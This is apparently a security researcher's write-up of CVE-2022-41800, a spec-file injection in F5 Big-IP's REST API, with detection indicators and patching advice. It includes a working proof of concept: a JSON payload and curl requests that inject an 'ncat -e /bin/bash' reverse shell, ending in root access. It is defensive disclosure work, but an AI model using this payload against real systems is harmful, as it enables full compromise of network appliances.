Description

On November 16, 2022, F5 released an advisory in F5 Big-IP related to several vulnerabilities, including CVE-2022-41800, which is an authenticated remote code execution vulnerability in the iControl RPC interface.

CVE-2022-41800 requires valid administrative credentials (or an authorization bypass such as CVE-2022-1388) to exploit, as well as network-level access to the management interface, so it is unlikely to see widespread exploitation. We did create a Metasploit module to test your own devices, however.

The affected products are detailed in the vendor’s writeup. We tested these against F5 Big-IP 17.0.0.1.

Technical analysis

F5 Big-IP’s JSON API has an administrator-only endpoint that creates an RPM specification file (.rpmspec) that is consumed by another administrator-only endpoint to create an RPM file. These endpoints are vulnerable to an injection attack into the RPM spec file, where additional fields can be added to the spec using newlines; notably, we can add executable shell commands that run when the resulting RPM file is created. This gives authenticated administrators (who may be malicious insiders, users of compromised accounts, etc) the ability to run shell commands in an unexpected way.

To demonstrate the vulnerability, we developed this JSON payload:

{
  "specFileData": {
    "name": "test",
    "srcBasePath": "/tmp",
    "version": "test6",
    "release": "test7",
    "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444",
    "summary": "test9"
  }
}

Note the newlines and %check in the description field, which according to the documentation is typically used to run tests. We send that JSON as part of an authenticated request to /rpm-spec-creator:

$ curl -sk -uadmin:Password1 -H "Content-Type: application/json" -X POST https://10.0.0.162/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData": {"name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7", "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444", "summary": "test9"}}'
{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}

The server responds with a specFilePath containing the spec we created. Here’s what the file looks like on the file system:

$ ssh root@10.0.0.162 cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec
Summary: test9
Name: test
Version: test6
Release: test7
BuildArch: noarch
Group: Development/Libraries
License: Commercial
Packager: F5 Networks <support@f5.com>

%description
test8

%check
ncat -e /bin/bash 10.0.0.179 4444

[...]

We start our listener on the host/port specified in the ncat command:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And build the RPM with /build-package (using jq to format the output):

$ curl -X POST -sku admin:Password1 https://10.0.0.162/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFile
Path": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec", "force": true }' | jq

{
  "step": "RUN_BUILD_RPM_TASK",
  "packageDirectory": "/tmp",
  "appName": "test",
  "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec",
  "force": true,
  "rpmDescription": "Default exported iApp description.",
  "rpmSummary": "Default exported iApp summary.",
  "isSpecFileToCleanUp": false,
  "id": "5de02c7f-ac65-4fa0-8c2b-b541967ce578",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "97163127-c56e-456c-af33-752dec349873",
  "generation": 1,
  "lastUpdateMicros": 1666214391730921,
  "kind": "shared:iapp:build-package:buildrpmtaskstate",
  "selfLink": "https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578"
}

Then verify that we get a root in shell on our listener:

$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.162.
Ncat: Connection from 10.0.0.162:58068.

whoami
root

IOCs

When exploiting this vulnerability, two files are potentially created:

• /var/config/rest/node/tmp/<random uuid>.spec
  
• /var/config/rest/node/tmp/RPMS/noarch/<name>.noarch.rpm
  

The latter can be prevented if the %check we inject exits with an error code, only creating the .spec file, but that creates a log entry. In our Metasploit module, we remove both files as soon as we obtain a session.

Any access to the pair of RPM endpoints should also be considered suspicious, although they do have benign uses:

• /mgmt/shared/iapp/build-package
  
• /mgmt/shared/iapp/rpm-spec-creator
  

Additional files that may log this attack are:

• /var/log/restjavad.*.log contains error messages if the build fails (which doesn’t necessarily happen)
  
• /var/log/restjavad-audit.*.log is an access log, and will show those endpoints being accessed (which might be benign)
  
• /var/log/restnoded/restnoded*.log also shows the endpoints being accessed
  

Guidance

Administrators should patch their F5 Big-IP devices as per the guidance from the vendor. Additionally, organizations should ensure that the management interface for F5 Big-IP is not easily accessible on the network level.

References

• Vendor advisory
  
• CVE-2022-41800 @ F5
  
• Rapid7 Blog
  
• Metasploit module
  
• Metasploit post-exploitation modules